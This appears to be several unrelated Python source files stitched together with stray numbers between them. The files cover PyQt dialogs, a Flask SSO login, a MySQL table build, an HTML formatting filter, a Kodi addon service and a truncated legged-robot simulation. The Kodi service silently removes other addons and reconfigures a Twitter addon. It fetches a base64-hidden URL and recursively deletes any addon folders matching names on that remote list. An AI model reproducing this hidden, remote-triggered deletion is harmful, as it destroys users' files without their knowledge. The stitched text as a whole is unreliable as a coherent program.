		self.itemsRight=itemsRight if itemsRight is not None else []
		self.itemsLeft=list(List)
		self.List=List

		#Buttons
		self.btnAdd=QtGui.QToolButton()
		self.btnAdd.connect(self.btnAdd, QtCore.SIGNAL('clicked()'), self.addItem)
		self.btnAdd.setArrowType(QtCore.Qt.RightArrow)

		self.btnRemove=QtGui.QToolButton()
		self.btnRemove.connect(self.btnRemove, QtCore.SIGNAL('clicked()'), self.removeItem)
		self.btnRemove.setArrowType(QtCore.Qt.LeftArrow)

		self.btnDone=QtGui.QPushButton('Done')
		self.btnDone.connect(self.btnDone, QtCore.SIGNAL('clicked()'), self.donePressed)

		#Left QtreeWidgetItem
		self.leftList=QtGui.QTreeWidget()
		self.leftList.setHeaderLabels([leftTitle])
		self.leftList.setColumnWidth(0,200)
		self.leftList.setColumnWidth(1,75)
		self.leftList.itemDoubleClicked.connect(self.addItem)

		#right QtreeWidgetItem
		self.rightList=QtGui.QTreeWidget()
		self.rightList.setHeaderLabels([rightTitle])
		self.rightList.setColumnWidth(0,200)
		self.rightList.setColumnWidth(1,75)
		self.rightList.itemDoubleClicked.connect(self.removeItem)

		#Layout
		self.vbox = QtGui.QVBoxLayout()
		self.vbox.addWidget(self.btnAdd)
		self.vbox.addWidget(self.btnRemove)

		self.hbox = QtGui.QHBoxLayout()
		self.hbox.addWidget(self.leftList)
		self.hbox.addLayout(self.vbox)
		self.hbox.addWidget(self.rightList)

		self.vbox2 = QtGui.QVBoxLayout()
		self.vbox2.addLayout(self.hbox)
		self.vbox2.addWidget(self.btnDone)

		#Init lists
		self.initLeftList()
		self.initRightList()

		self.resize(400,500)
		self.setLayout(self.vbox2)
		self.setWindowTitle("list Selector Dialog")
		self.show()

	def getListDifference(self):

		"""Drops every item that is already in itemsRight from itemsLeft
		and returns itemsLeft."""

		# FIX: iterate over a snapshot - removing from the list while
		# iterating it skipped the element following each removal.
		for item in list(self.itemsLeft):
			if item in self.itemsRight:
				self.itemsLeft.remove(item)
		return self.itemsLeft

	def initLeftList(self):

		"""Fills the left pane with the not-yet-selected items."""

		self.getListDifference()
		for item in self.itemsLeft:
			QtGui.QTreeWidgetItem(self.leftList,[item])

	def initRightList(self):

		"""Fills the right pane with the already selected items."""

		for item in self.itemsRight:
			QtGui.QTreeWidgetItem(self.rightList,[item])

	def addItem(self):

		"""Moves the currently selected left-pane item to the right pane."""

		#Determine selected item
		self.currentItem=str(self.leftList.currentItem().data(0,0).toString())

		#Insert new node in right list
		newNode=QtGui.QTreeWidgetItem(self.rightList,[self.currentItem])

		#Remove node in left list
		self.currLeftInd=self.leftList.indexFromItem(self.leftList.currentItem()).row()
		self.leftList.takeTopLevelItem(self.currLeftInd)

		self.itemsRight.append(self.currentItem)
		self.itemsLeft.remove(self.currentItem)

	def removeItem(self):

		"""Moves the currently selected right-pane item back to the left pane."""

		#Determine selected item
		self.currentItem=str(self.rightList.currentItem().data(0,0).toString())

		#Insert new node in left list
		newNode=QtGui.QTreeWidgetItem(self.leftList,[self.currentItem])

		#Remove node in right list
		self.currRightInd=self.rightList.indexFromItem(self.rightList.currentItem()).row()
		self.rightList.takeTopLevelItem(self.currRightInd)

		self.itemsRight.remove(self.currentItem)
		self.itemsLeft.append(self.currentItem)

	def getSelection(self):

		"""Returns the list of items currently in the right pane."""

		return self.itemsRight

	def donePressed(self):

		"""Closes the dialog with result code 1."""

		self.done(1)
		return

#===================================================================================================================================
#Basic Selector for a list of items out of a list
#===================================================================================================================================

class advancedListSelectorDialog(listSelectorDialog):

	"""listSelectorDialog with extra Up/Down buttons to reorder the
	right-pane (selected) items."""

	def __init__(self,parent,List,leftTitle="",rightTitle="",itemsRight=None):

		# FIX: itemsRight was accepted but never forwarded to the base
		# class, so pre-selected items were silently dropped.
		super(advancedListSelectorDialog,self).__init__(parent,List,leftTitle=leftTitle,rightTitle=rightTitle,itemsRight=itemsRight)

		self.btnUp=QtGui.QToolButton()
		self.btnUp.connect(self.btnUp, QtCore.SIGNAL('clicked()'), self.upItem)
		self.btnUp.setArrowType(QtCore.Qt.UpArrow)

		self.btnDown=QtGui.QToolButton()
		self.btnDown.connect(self.btnDown, QtCore.SIGNAL('clicked()'), self.downItem)
		self.btnDown.setArrowType(QtCore.Qt.DownArrow)

		self.vbox.addWidget(self.btnUp)
		self.vbox.addWidget(self.btnDown)

		self.setWindowTitle("advanced List Selector Dialog")

	def upItem(self):

		"""Moves the selected right-pane item one position up."""

		# Guard against no selection (clicking the button before any item
		# was selected used to raise AttributeError).
		if self.rightList.currentItem() is None:
			return

		#Determine selected item
		self.currentItem=str(self.rightList.currentItem().data(0,0).toString())

		#Determine index in sel prop list
		ind=self.itemsRight.index(self.currentItem)

		#Swap in list, then rebuild the widget so it matches
		if ind>0:
			self.itemsRight[ind-1], self.itemsRight[ind] = self.itemsRight[ind], self.itemsRight[ind-1]

			#Clear list and recreate it
			self.rightList.clear()
			self.initRightList()

			self.currentRightItem=self.rightList.topLevelItem(ind-1)
			self.rightList.setCurrentItem(self.currentRightItem)

	def downItem(self):

		"""Moves the selected right-pane item one position down."""

		# Guard against no selection (see upItem).
		if self.rightList.currentItem() is None:
			return

		#Determine selected item
		self.currentItem=str(self.rightList.currentItem().data(0,0).toString())

		#Determine index in sel prop list
		ind=self.itemsRight.index(self.currentItem)

		#Swap in list, then rebuild the widget so it matches
		if ind<len(self.itemsRight)-1:
			self.itemsRight[ind+1], self.itemsRight[ind] = self.itemsRight[ind], self.itemsRight[ind+1]

			#Clear list and recreate it
			self.rightList.clear()
			self.initRightList()

			self.currentRightItem=self.rightList.topLevelItem(ind+1)
			self.rightList.setCurrentItem(self.currentRightItem)

#===================================================================================================================================
#Basic Progress Dialog
#===================================================================================================================================

class progressDialog(QtGui.QDialog):

	"""Simple modeless dialog with a label, a 1-100 progress bar and a
	Cancel button."""

	def __init__(self,parent):

		super(progressDialog,self).__init__(parent)

		#Labels
		self.lblName = QtGui.QLabel("Something in progress...", self)

		#Buttons
		self.btnCancel=QtGui.QPushButton('Cancel')
		self.btnCancel.connect(self.btnCancel, QtCore.SIGNAL('clicked()'), self.cancel)

		#ProgressBar
		self.progressbar = QtGui.QProgressBar()
		self.progressbar.setMinimum(1)
		self.progressbar.setMaximum(100)

		#Layout
		self.vbox = QtGui.QVBoxLayout()
		self.vbox.addWidget(self.lblName)
		self.vbox.addWidget(self.progressbar)
		self.vbox.addWidget(self.btnCancel)

		self.setLayout(self.vbox)
		self.setWindowTitle('Progress Dialog')
		self.show()

	def cancel(self):

		# NOTE(review): Cancel emits the *accepted* signal; callers appear
		# to rely on this to tear the dialog down - confirm before changing.
		self.accepted.emit()

#===================================================================================================================================
#Basic PyFRAP Thread
#===================================================================================================================================

#Simple worker class
class pyfrpWorker(QtCore.QObject):

	"""Worker object running ``function(*args, **kwargs)`` when its start
	signal fires and emitting taskFinished afterwards."""

	taskFinished = QtCore.pyqtSignal()
	start = QtCore.pyqtSignal()

	def __init__(self, function, *args, **kwargs):
		super(pyfrpWorker, self).__init__()
		self.function = function
		self.args = args
		self.kwargs = kwargs
		self.start.connect(self.run)

	#@QtCore.pyqtSlot() (Interesting: the pyqtslot decorator seems to block the start signal...)
	def run(self):

		"""Executes the wrapped function and signals completion."""

		self.function(*self.args, **self.kwargs)
		self.taskFinished.emit()

class pyfrpThread(QtCore.QThread):

	"""QThread that blocks in __del__ until the thread has finished."""

	progressSignal = QtCore.pyqtSignal(int)

	def __init__(self, parent=None):
		# NOTE(review): parent is accepted but not forwarded to QThread -
		# kept as found since reparenting could change object lifetime.
		QtCore.QThread.__init__(self)

	def __del__(self):
		self.wait()

#===================================================================================================================================
#Basic Wait Dialog
#===================================================================================================================================

class waitDialog(QtGui.QDialog):

	"""Minimal dialog with a label and a Cancel button, shown while some
	background task runs."""

	def __init__(self,parent):

		super(waitDialog,self).__init__(parent)

		#Labels
		self.lblName = QtGui.QLabel("Something in progress...", self)

		#Buttons
		self.btnCancel=QtGui.QPushButton('Cancel')
		self.btnCancel.connect(self.btnCancel, QtCore.SIGNAL('clicked()'), self.cancel)

		#Layout
		self.vbox = QtGui.QVBoxLayout()
		self.vbox.addWidget(self.lblName)
		self.vbox.addWidget(self.btnCancel)

		self.setLayout(self.vbox)
		self.setWindowTitle('Progress Dialog')
		self.show()

	def cancel(self):

		# NOTE(review): emits *accepted* on cancel, mirroring progressDialog.
		self.accepted.emit()
0.050905
# Standard library
from urllib.parse import quote, unquote

# Packages
import flask
import flask_openid
import talisker.requests
from pymacaroons import Macaroon

# Local
from webapp.macaroons import (
    binary_serialize_macaroons,
    MacaroonRequest,
    MacaroonResponse,
)

# OpenID consumer for the Canonical SSO login flow; macaroon discharges
# travel in the MacaroonResponse OpenID extension.
open_id = flask_openid.OpenID(
    stateless=True, safe_roots=[], extension_responses=[MacaroonResponse]
)
session = talisker.requests.get_session()


def user_info(user_session):
    """Return identity details for an authenticated session.

    A session counts as authenticated when it carries both the OpenID
    identity and the serialized macaroon token.

    Returns a dict with fullname, email and authentication_token, or None
    when the user is not authenticated.
    """
    if "openid" in user_session and "authentication_token" in user_session:
        return {
            "fullname": user_session["openid"]["fullname"],
            "email": user_session["openid"]["email"],
            "authentication_token": user_session["authentication_token"],
        }

    return None


def empty_session(user_session):
    """Remove all authentication state from the session."""
    user_session.pop("macaroon_root", None)
    user_session.pop("authentication_token", None)
    user_session.pop("openid", None)


@open_id.loginhandler
def login_handler():
    """Start the SSO login flow.

    Fetches a macaroon root from the contracts API, stores it in the
    session and redirects the user to Canonical SSO to discharge the
    login.ubuntu.com third-party caveat.
    """
    is_test_backend = flask.request.args.get("test_backend", False)

    api_url = flask.current_app.config["CONTRACTS_LIVE_API_URL"]

    if is_test_backend:
        api_url = flask.current_app.config["CONTRACTS_TEST_API_URL"]

    # Already logged in: skip straight to the destination.
    if user_info(flask.session):
        return flask.redirect(open_id.get_next_url())

    response = session.request(
        method="get", url=f"{api_url}/v1/canonical-sso-macaroon"
    )
    flask.session["macaroon_root"] = response.json()["macaroon"]

    # FIX: openid_macaroon was left unbound (NameError at try_login) when
    # the macaroon carried no login.ubuntu.com caveat; fail explicitly.
    openid_macaroon = None

    for caveat in Macaroon.deserialize(
        flask.session["macaroon_root"]
    ).third_party_caveats():
        if caveat.location == "login.ubuntu.com":
            openid_macaroon = MacaroonRequest(caveat_id=caveat.caveat_id)
            break

    if openid_macaroon is None:
        flask.abort(
            502, "Macaroon root carries no login.ubuntu.com caveat"
        )

    return open_id.try_login(
        flask.current_app.config["CANONICAL_LOGIN_URL"],
        ask_for=["email", "nickname", "image"],
        ask_for_optional=["fullname"],
        extensions=[openid_macaroon],
    )


@open_id.after_login
def after_login(resp):
    """Finish the SSO login: bind the discharge macaroon and store identity.

    Binds the discharge returned by SSO to the stored root, serializes the
    pair as the session's authentication token and records the OpenID
    identity details.
    """
    root = Macaroon.deserialize(flask.session.pop("macaroon_root"))
    bound = root.prepare_for_request(
        Macaroon.deserialize(resp.extensions["macaroon"].discharge)
    )
    flask.session["authentication_token"] = binary_serialize_macaroons(
        [root, bound]
    ).decode("utf-8")

    # No nickname means the SSO response is unusable; restart the login.
    if not resp.nickname:
        return flask.redirect(flask.current_app.config["CANONICAL_LOGIN_URL"])

    flask.session["openid"] = {
        "identity_url": resp.identity_url,
        "nickname": resp.nickname,
        "fullname": resp.fullname,
        "image": resp.image,
        "email": resp.email,
    }

    return flask.redirect(open_id.get_next_url())


def logout():
    """Clear the session and redirect to the SSO logout endpoint."""
    return_to = flask.request.args.get("return_to") or flask.request.url_root

    # Make sure return_to is URL encoded
    if return_to == unquote(return_to):
        return_to = quote(return_to, safe="")

    empty_session(flask.session)

    login_url = flask.current_app.config["CANONICAL_LOGIN_URL"]
    return flask.redirect(
        f"{login_url}/+logout?return_to={return_to}&return_now=True"
    )
0
# Create the quick lookup protein features # table by combining annotation from other # resources into a single table. import Config import sys, string import MySQLdb import Database from classes import Quick with Database.db as cursor : quick = Quick.Quick( Database.db, cursor ) cursor.execute( "TRUNCATE TABLE " + Config.DB_QUICK + ".quick_uniprot_features" ) Database.db.commit( ) cursor.execute( "SELECT * FROM " + Config.DB_NAME + ".uniprot_features" ) recordSize = 8 # Number of Columns in quick_protein_features table sqlFormat = ",".join( ['%s'] * recordSize ) query = "INSERT INTO " + Config.DB_QUICK + ".quick_uniprot_features VALUES (%s)" % sqlFormat insertCount = 0 for row in cursor.fetchall( ) : record = [row[0], row[1], row[2], row[3], row[4], row[5], row[6]] proteinID = str(row[9]) if proteinID : cursor.execute( query, tuple(record + [proteinID]) ) cursor.execute( "INSERT INTO " + Config.DB_STATS + ".update_tracker VALUES ( '0', 'QUICK_buildUniprotFeatures', NOW( ) )" ) Database.db.commit( ) sys.exit( )
0.051259
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Generic formatting filter: creates proper indentation for each tree node,
placing "%s" placeholder where the actual output should be. You can use this
filter to preformat tree and then replace %s placeholder to whatever you need.

This filter shouldn't be called directly from editor as a part of
abbreviation.

@author Sergey Chikuyonok (serge.che@gmail.com)
@link http://chikuyonok.ru
"""
import re

from zencoding import zen_core as zen_coding

alias = '_format'
"Filter name alias (if not defined, ZC will use module name)"

# Token that marks the child-insertion point inside a snippet definition
child_token = '${child}'
# Placeholder written into node.start/node.end; replaced by later filters
placeholder = '%s'

def get_newline():
	"""Returns the newline string configured in zen_core."""
	return zen_coding.get_newline()

def get_indentation():
	"""Returns one unit of indentation as configured in zen_core."""
	return zen_coding.get_indentation()

def has_block_sibling(item):
	"""
	Test if passed node has block-level sibling element
	@type item: ZenNode
	@return: bool
	"""
	return item.parent and item.parent.has_block_children()

def is_very_first_child(item):
	"""
	Test if passed item is very first child of the whole tree
	@type item: ZenNode
	@return: bool
	"""
	# The tree root is the only node without a parent, so "parent exists but
	# grandparent doesn't" means item sits directly under the root.
	return item.parent and not item.parent.parent and not item.previous_sibling

def should_break_line(node, profile):
	"""
	Need to add line break before element
	@type node: ZenNode
	@type profile: dict
	@return: bool
	"""
	if not profile['inline_break']:
		return False

	# find toppest non-inline sibling
	while node.previous_sibling and node.previous_sibling.is_inline():
		node = node.previous_sibling

	if not node.is_inline():
		return False

	# calculate how many inline siblings we have
	node_count = 1
	node = node.next_sibling
	while node:
		if node.is_inline():
			node_count += 1
		else:
			break
		node = node.next_sibling

	# break the run onto separate lines once it reaches the profile threshold
	return node_count >= profile['inline_break']

def should_break_child(node, profile):
	"""
	Need to add newline because <code>item</code> has too many inline children
	@type node: ZenNode
	@type profile: dict
	@return: bool
	"""
	# we need to test only one child element, because
	# has_block_children() method will do the rest
	return node.children and should_break_line(node.children[0], profile)

def process_snippet(item, profile, level=0):
	"""
	Processes element with <code>snippet</code> type
	@type item: ZenNode
	@type profile: dict
	@param level: Depth level
	@type level: int
	@return: ZenNode (the same item, with start/end/padding set)
	"""
	data = item.source.value;

	if not data:
		# snippet wasn't found, process it as tag
		return process_tag(item, profile, level)

	item.start = placeholder
	item.end = placeholder

	padding = item.parent.padding if item.parent else get_indentation() * level

	if not is_very_first_child(item):
		item.start = get_newline() + padding + item.start

	# adjust item formatting according to last line of <code>start</code> property
	parts = data.split(child_token)
	lines = zen_coding.split_by_lines(parts[0] or '')
	padding_delta = get_indentation()

	if len(lines) > 1:
		# inherit the leading whitespace of the snippet's last line so
		# children line up with the snippet's own indentation
		m = re.match(r'^(\s+)', lines[-1])
		if m:
			padding_delta = m.group(1)

	item.padding = padding + padding_delta

	return item

def process_tag(item, profile, level=0):
	"""
	Processes element with <code>tag</code> type
	@type item: ZenNode
	@type profile: dict
	@param level: Depth level
	@type level: int
	@return: ZenNode (the same item, with start/end/padding set)
	"""
	if not item.name:
		# looks like it's a root element
		return item

	item.start = placeholder
	item.end = placeholder

	is_unary = item.is_unary() and not item.children

	# formatting output
	if profile['tag_nl'] is not False:
		padding = item.parent.padding if item.parent else get_indentation() * level
		force_nl = profile['tag_nl'] is True
		should_break = should_break_line(item, profile)

		# formatting block-level elements
		if ((item.is_block() or should_break) and item.parent) or force_nl:
			# snippet children should take different formatting
			if not item.parent or (item.parent.type != 'snippet' and not is_very_first_child(item)):
				item.start = get_newline() + padding + item.start

			if item.has_block_children() or should_break_child(item, profile) or (force_nl and not is_unary):
				item.end = get_newline() + padding + item.end

			if item.has_tags_in_content() or (force_nl and not item.has_children() and not is_unary):
				item.start += get_newline() + padding + get_indentation()

		elif item.is_inline() and has_block_sibling(item) and not is_very_first_child(item):
			item.start = get_newline() + padding + item.start

		item.padding = padding + get_indentation()

	return item

def process(tree, profile, level=0):
	"""
	Processes simplified tree, making it suitable for output as HTML structure
	@type tree: ZenNode
	@type profile: dict
	@param level: Depth level
	@type level: int
	@return: ZenNode (the processed tree)
	"""
	for item in tree.children:
		if item.type == 'tag':
			item = process_tag(item, profile, level)
		else:
			item = process_snippet(item, profile, level)

		# indent multi-line content to the node's computed padding
		if item.content:
			item.content = zen_coding.pad_string(item.content, item.padding)

		process(item, profile, level + 1)

	return tree
0.038415
import xbmc,xbmcgui,time,os,shutil,re,urllib2 from libs import kodi import support import xbmcaddon import common as Common import base64 addon_id=kodi.addon_id kodi.log('STARTING INDIGO SERVICE') ############################ addonPath=xbmcaddon.Addon(id=addon_id).getAddonInfo('path') addonPath=xbmc.translatePath(addonPath) xbmcPath=os.path.join(addonPath,"..","..") xbmcPath=os.path.abspath(xbmcPath) addonpath = xbmcPath+'/addons/' mediapath = xbmcPath+'/media/' systempath = xbmcPath+'/system/' userdatapath = xbmcPath+'/userdata/' indisettingspath = xbmcPath+'/userdata/addon_data/plugin.program.indigo/settings.xml' packagepath = xbmcPath+ '/addons/packages/' ############################## ############################## oldinstaller =xbmc.translatePath(os.path.join('special://home','addons','plugin.program.addoninstaller')) oldnotify = xbmc.translatePath(os.path.join('special://home','addons','plugin.program.xbmchub.notifications')) oldmain = xbmc.translatePath(os.path.join('special://home','addons','plugin.video.xbmchubmaintenance')) oldwiz = xbmc.translatePath(os.path.join('special://home','addons','plugin.video.hubwizard')) oldfresh = xbmc.translatePath(os.path.join('special://home','addons','plugin.video.freshstart')) oldmain2 = xbmc.translatePath(os.path.join('special://home','addons','plugin.video.hubmaintenance')) try: if os.path.exists(oldinstaller): shutil.rmtree(oldinstaller) if os.path.exists(oldnotify): shutil.rmtree(oldnotify) if os.path.exists(oldmain): shutil.rmtree(oldmain) if os.path.exists(oldwiz): shutil.rmtree(oldwiz) if os.path.exists(oldfresh): shutil.rmtree(oldfresh) except: pass ############################## if xbmc.getCondVisibility('System.HasAddon(script.service.twitter)'): search_string = xbmcaddon.Addon('script.service.twitter').getSetting('search_string') search_string = search_string.replace('from:@','from:') xbmcaddon.Addon('script.service.twitter').setSetting('search_string',search_string) 
xbmcaddon.Addon('script.service.twitter').setSetting('enable_service','false') ## Start of notifications if kodi.get_setting('hasran')=='true': #kodi.log('Indigo has ran before') TypeOfMessage="t" (NewImage,NewMessage)=Common.FetchNews() Common.CheckNews(TypeOfMessage,NewImage,NewMessage,True) else: kodi.log('Indigo has NOT ran before') ## ################################################## ## ## ################################################## ## ## Start of program support.service_checks() support.scriptblock_checks() ## ################################################## ## ## ################################################## ## if __name__ == '__main__': monitor = xbmc.Monitor() while not monitor.abortRequested(): # Sleep/wait for abort for 10 seconds 12 hours is 43200 1 hours is 3600 if monitor.waitForAbort(1800): # Abort was requested while waiting. We should exit kodi.log('CLOSING INDIGO SERVICES') break if kodi.get_setting ('automain') == 'true': xbmc_cache_path = os.path.join(xbmc.translatePath('special://home'), 'cache') if os.path.exists(xbmc_cache_path)==True: for root, dirs, files in os.walk(xbmc_cache_path): file_count = 0 file_count += len(files) if file_count > 0: for f in files: try: os.unlink(os.path.join(root, f)) except: pass for d in dirs: try: shutil.rmtree(os.path.join(root, d)) except: pass kodi.log('Service could not clear cache') #DO PURGE IS NEEDED kodi.log('Purging Packages') packages_path = xbmc.translatePath(os.path.join('special://home/addons/packages', '')) try: for root, dirs, files in os.walk(packages_path,topdown=False): for name in files : os.remove(os.path.join(root,name)) #kodi.log('Packages Wiped by Service') except: kodi.log('Service could not purge packages') else: pass if kodi.get_setting ('scriptblock') == 'true': kodi.log('Checking for Malicious scripts') BlocksUrl = base64.b64decode('aHR0cDovL2luZGlnby50dmFkZG9ucy5hZy9ibG9ja2VyL2Jsb2NrZXIudHh0') req=urllib2.Request(BlocksUrl) req.add_header('User-Agent', 'Mozilla/5.0 
(Linux; U; Android 4.2.2; en-us; AFTB Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') response=urllib2.urlopen(req) link=response.read() response.close() link = link.replace('\n','').replace('\r','').replace('\a','') match=re.compile('block="(.+?)"').findall(link) for blocked in match: addonPath=xbmcaddon.Addon(id=addon_id).getAddonInfo('path') addonPath=xbmc.translatePath(addonPath) xbmcPath=os.path.join(addonPath,"..","..") xbmcPath=os.path.abspath(xbmcPath); addonpath = xbmcPath+'/addons/' try: for root, dirs, files in os.walk(addonpath,topdown=False): if root != addonpath : if blocked in root: shutil.rmtree(root) except: kodi.log('Could not find blocked script')
0.034597
import time, sys, copy import scipy.optimize import numpy.random import pylab import csync from fastode import FastODE from copy import copy as COPY from pdb import set_trace as BREAKPOINT execfile("hybsys.py") FASTODE_CTSLIP = FastODE("ctslip") def plotCircle( xc, yc, r, steps = 36, arc=(-pi,pi), **kw ): """Plot a circle around (xc,yc) with radius r, and specified number of steps in the polygonal approximation""" t = linspace(arc[0],arc[-1],steps) return plot( xc + cos(t)*r, yc+sin(t)*r, **kw ) def plotZigZag( x0, y0, x1, y1, w, N = 7, **kw ): dx = array((x1-x0,y1-y0)) l = sqrt(sum(dx**2.0)) dx = dx/l dy = array((-dx[1],dx[0])) n = arange(0,N+1) ax = concatenate(([0], n/float(N), [1] )) ay = 0.5*concatenate(([0], (-1.0)**n, [0] )) x = ax*l*dx[0] + ay*w*dy[0] + x0 y = ax*l*dx[1] + ay*w*dy[1] + y0 return plot(x,y,**kw) SRC = csync.getSrc("ctslip.c") class CTSLIP_events( csync.FlexSOD ): Fields = csync.getFields(SRC,"CTSLIP_events",2) class CTSLIP_state( csync.FlexSOD ): Fields = ['t']+csync.getFields(SRC,"CTSLIP_state",2) assert len(Fields) == FASTODE_CTSLIP.DIM+1 def upd50_par( self, nm, val ): if not hasattr( val, 'clkTD') or val.clkTD is None: return if val.gravityZ>=0: return # Estimate time 'till touchdown t2td = sqrt( 2 * self.com_z / -val.gravityZ ) # Create clk IC that cancels phase change while falling self.clk = val.clkTD - t2td * val.omega print "[upd] fixed initial clk for clkTD" def upd90_mdl(self, nm, val): x = CTSLIP_aux() y0 = numpy.concatenate( (self[:],zeros(len(x))) ) val.computeAux( y0 ) x.fromArray(y0[len(self):]) # If leg 0 is on COM --> move to ref if self.leg_z_0 == 0 and self.leg_x_0 == 0: self.leg_x_0 = x.ref_x_0 self.leg_z_0 = x.ref_z_0 print "[upd] Locked initial leg 0 position to reference" # if a penetrating stance --> fix it if self.com_z+self.leg_z_0<0: self.leg_x_0 *= abs(self.com_z)/abs(self.leg_z_0) self.leg_z_0 = -self.com_z print "[upd] Initial leg 0 moved to Z=0" # If leg 1 is on COM --> move to ref if self.leg_z_1 == 0 and 
self.leg_x_1 == 0: self.leg_x_1 = x.ref_x_1 self.leg_z_1 = x.ref_z_1 print "[upd] Locked initial leg 1 position to reference" # if a penetrating stance --> fix it if self.com_z+self.leg_z_0<1: self.leg_x_1 *= abs(self.com_z)/abs(self.leg_z_1) self.leg_z_1 = -self.com_z print "[upd] Initial leg 1 moved to Z=0" return def upd50_plane( self, nm, coef ): """ dot([1,state],coef)-val is the event function coef -- len<5 -- (val, co_clk, co_vx, co_z, co_vz, co_x), zeros appended """ coef = array((list(coef)+[0]*6)[:6],float) if not any(coef): coef[0] = 1000 print "[upd] plane event disabled" else: p = self.par (p.co_value, p.co_clk, p.co_com_vx, p.co_com_z, p.co_com_vz, p.co_com_x) = coef print "[upd] plane is ", coef def getPlane( self ): p = self.par return array([p.co_clk,p.co_com_vx, p.co_com_z,p.co_com_vz, p.co_com_x]) def planeVal( self, dat ): p = self.par co = self.getPlane() dat = asarray(dat) if dat.shape[-1] != len(co): s = CTSLIP_xst() dat = dat[..., [s.clk, s.com_vx, s.com_z, s.com_vz, s.com_x]] return dot(dat,co)+ p.co_value def copy( self ): res = COPY(self) if hasattr(res,'par'): res.par = res.par.copy() return res class CTSLIP_param( csync.FlexSOD ): Fields = csync.getFields(SRC,"CTSLIP_param",2) assert len(Fields) == FASTODE_CTSLIP.NPAR def upd20_stWn( self, nm, val ): self.stK = val*val self.stMu = self.stZeta * 2 * val print "[upd] set stK, stMu from stWn, stZeta" def upd09_hexed( self, nm, val ): tc,dc,phs,ph0,Kp,Kd = val # Omega is 2*pi/(time-of-cycle), but direction is negative! 
self.omega = -2*pi / tc # Our duty cycle is in radians self.stHalfDuty = dc * pi # Sweep angle is the same self.stHalfSweep = phs/2.0 # Zero angle is "down" for hexed data self.stOfs = ph0-pi/2 # Proportional FB is just like the torsional stiffness # NOTE: for small changes; we use sin(delta) in the eqn self.tqKth = Kp # Given warning if a nonzero Kd is requested if Kd != 0: print "[upd] WARNING: Kd=%g requested by Kd not supported" % Kd print "[upd] applied hextuple ",repr(val) def upd10_stDecayFrac( self, nm, val ): # arc subtended by decay time ang = val * self.stHalfDuty # Natural frequency must finish arc in time self.stWn = abs(self.omega) * (2 * pi / ang) print "[upd] set stWn from stDecayFrac" def upd90_stHalfDuty( self, nm, val ): if val<0 or val>pi: raise ValueError, "Half duty cycle range is 0..PI" if val==0 or val==pi: self.stHalfDuty += 1e-99 print "[upd] fixed invalid stHalfDuty -- don't use 0 and PI!" def copy( self ): return COPY(self) class CTSLIP_aux( csync.FlexSOD ): Fields = csync.getFields(SRC,"CTSLIP_aux",2) assert len(Fields) == FASTODE_CTSLIP.AUX class CTSLIP_xst( csync.FlexSOD ): "Extended state -- includes auxvars" Fields = ( ['t'] + csync.getFields(SRC,"CTSLIP_state",2) + csync.getFields(SRC,"CTSLIP_aux",2) ) assert len(Fields) == FASTODE_CTSLIP.WIDTH def upd_dbg( self, name, val ): print "UPD called" def cfgFromParam( self, pars ): self.vis_R = pars.len0/5 self.vis_W = self.vis_R * 0.75 self.vis_ofs = pars.stOfs if abs(pars.stHalfSweep - pars.stHalfDuty)>0.02: self.vis_swp = pars.stHalfSweep else: self.vis_swp = 0 self.domain = int(pars.domain) def plot( self ): X = self.com_x Z = self.com_z+self.zOfs l = plotCircle( X, Z, self.vis_R, 36, color='k', linewidth=2 ) if self.vis_swp: l.append( plotCircle( X, Z, self.vis_R, 18, arc=(self.vis_ofs-self.vis_swp, self.vis_ofs+self.vis_swp), color=[0.6,0.9,0.6], linewidth=5 )) l.append( plot( [X, X+self.vis_R*1.6*cos(self.clk)], [Z, Z+self.vis_R*1.6*sin(self.clk)], color='m',linewidth= 2 )) for 
leg in xrange(2): lx = getattr(self,"leg_x_%d"%leg) lz = getattr(self,"leg_z_%d"%leg) rx = getattr(self,"ref_x_%d"%leg) rz = getattr(self,"ref_z_%d"%leg) lc = 'brgmck'[leg] l.append( plot([X+rx],[Z+rz],'d'+lc) ) lkw = { 'color' : lc, 'linewidth' : 2 } if self.domain & (1<<leg): l.extend( plotZigZag( X+lx*0.2, Z+lz*0.2, X+lx*0.8, Z+lz*0.8, self.vis_W, 7, **lkw ) + plot( [X,X+lx*0.2],[Z,Z+lz*0.2], **lkw ) + plot( [X+lx*0.8,X+lx],[Z+lz*0.8,Z+lz], **lkw ) + plot( [X+lx], [Z+lz], '^'+lc ) ) else: l.extend( plot( [X, X+lx], [Z, Z+lz], '-', **lkw ) #+plot( [X+lx], [Z+lz], 'o'+lc ) ) return l class ENUM: def __init__(self, *argv ): self._tbl={} for nm,val in zip(argv,range(len(argv))): setattr(self,nm,val) self._tbl[val]=nm def __len__( self ): return len(self._tbl) def __getitem__(self,key): try: return self._tbl[int(key)] except KeyError: return "UNKNOWN<%d>" % key except ValueError: pass try: return getattr(self,key) except AttributeError: pass if type(key)==int: return key return "UNKNOWN<%s>" % key DomName = ENUM('flyDown','stand0','stand1','both','flyUp') EvtName = ENUM(*CTSLIP_events.Fields) EvtName._tbl[-1] = "(START)" class CTS( HybSys ): F = CTSLIP_xst() P = CTSLIP_param() # Build domain transitions from human readable form TRANS = {} for x in [ 'stand0 lift0 flyUp', 'stand1 lift1 flyUp', 'stand0 land1 both', 'stand1 land0 both', 'both lift0 stand1', 'both lift1 stand0', 'flyDown land0 stand0', 'flyDown land1 stand1', 'stand0 apex stand0', 'stand1 apex stand1', 'both apex both', 'flyUp apex flyDown' ]: src,ev,dst = x.split(" ") TRANS[(DomName[src],EvtName[ev])] = DomName[dst] def __init__(self): HybSys.__init__(self,FASTODE_CTSLIP) self.domDt = [ 1e-3 ] * 5 self.toApex = False self.planeCounter = 0 self.planeTime = -1 self.planeGap = 0.001 self.setGround() def getParam( self ): return CTSLIP_param().fromArray( self.param ) def getICS( self ): return CTSLIP_state().fromArray( self.y[0,:self.ode.DIM+1] ) def integrate(self,*argv,**kwarg): p = self.getParam() assert 
